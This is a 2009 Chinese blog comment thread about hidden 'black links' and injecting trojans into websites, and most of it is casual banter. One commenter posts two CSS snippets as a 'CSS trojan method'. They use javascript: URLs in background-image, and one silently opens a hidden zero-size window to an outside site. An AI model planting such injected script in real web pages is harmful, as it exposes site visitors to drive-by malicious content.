什么是挂黑链的？
小明猪于 2009-7-13 17:17:16 回复
四楼正解，我刚看到标题第一个想到的就是这个
卢松松于 2009-7-19 15:16:59 回复
黑链也叫隐藏链接是私自在别人的网站上挂自己的连接 .
6楼lowkey回复该留言
Post:2009-7-13 14:39:29
这边的人气跟我的SEO博客真的是不可同日而语啊~~
卢松松于 2009-7-19 15:14:35 回复
SEO太流行。
坚持，勤奋，专一，你也会一样的！
myan 于 2011-3-24 14:03:23 回复
lowkey好像把位置弄反了。
5楼小小回复该留言
Post:2009-7-13 14:08:33
这个很有用，以前一直没在意过
卢松松于 2009-7-19 15:10:56 回复
防范于未然嘛！
4楼小鬼回复该留言
Post:2009-7-13 13:50:39
话说还有CSS挂马法
Body{

　　background-image: url('javascript:document.write("")')

　　}
-------------------------------
Body{

　　background-image: url(javascript:open(' http://www.lyzsoft.cn '，'newwindow'，'height=0， width=0， top=1000， left=0， toolbar=no， menubar=no， scrollbars=no， resizable=no，location=no， status=no'))

　　}
芒果于 2009-7-13 22:37:41 回复
头回听说，长了见识了。
chouray 于 2009-7-14 14:43:45 回复
..................回火星地球物种马很强悍
妖狐闪现于 2009-7-14 22:47:56 回复
哈哈，小鬼果然是高手！
小鬼于 2009-7-14 23:54:08 回复
话说我是冥王星人来的，路过地球打酱油回家炒菜的
= =
卢松松于 2009-7-19 15:09:21 回复
看来小鬼对挂马很熟悉啊，是不是做这个的？
小鬼于 2009-7-19 19:32:03 回复
初中的时候研究过
卢松松于 2009-7-20 14:52:52 回复
看来你也好这一口啊，搞黑客技术有没有收获呢？
小鬼于 2009-7-20 20:47:17 回复
现在不怎么搞了，搞的话也是道德黑客
卢松松于 2009-8-3 11:34:46 回复
是不是应该叫红客呢？
小鬼于 2009-8-3 11:37:03 回复
呵呵，现在什么都不是了，学生一个，正常人一个
3楼小鬼回复该留言
Post:2009-7-13 13:47:23
= =赶紧地板，广告位出租
2楼Lxhome回复该留言
Post:2009-7-13 13:42:13
在这里抢沙发好难啊。
我得赶紧去查查了，不知道自己的有没有被挂马呢
1楼Lxhome回复该留言
Post:2009-7-13 13:41:00
终于有次沙发了
妖狐闪现于 2009-7-13 19:38:18 回复
wow，被你抢到了～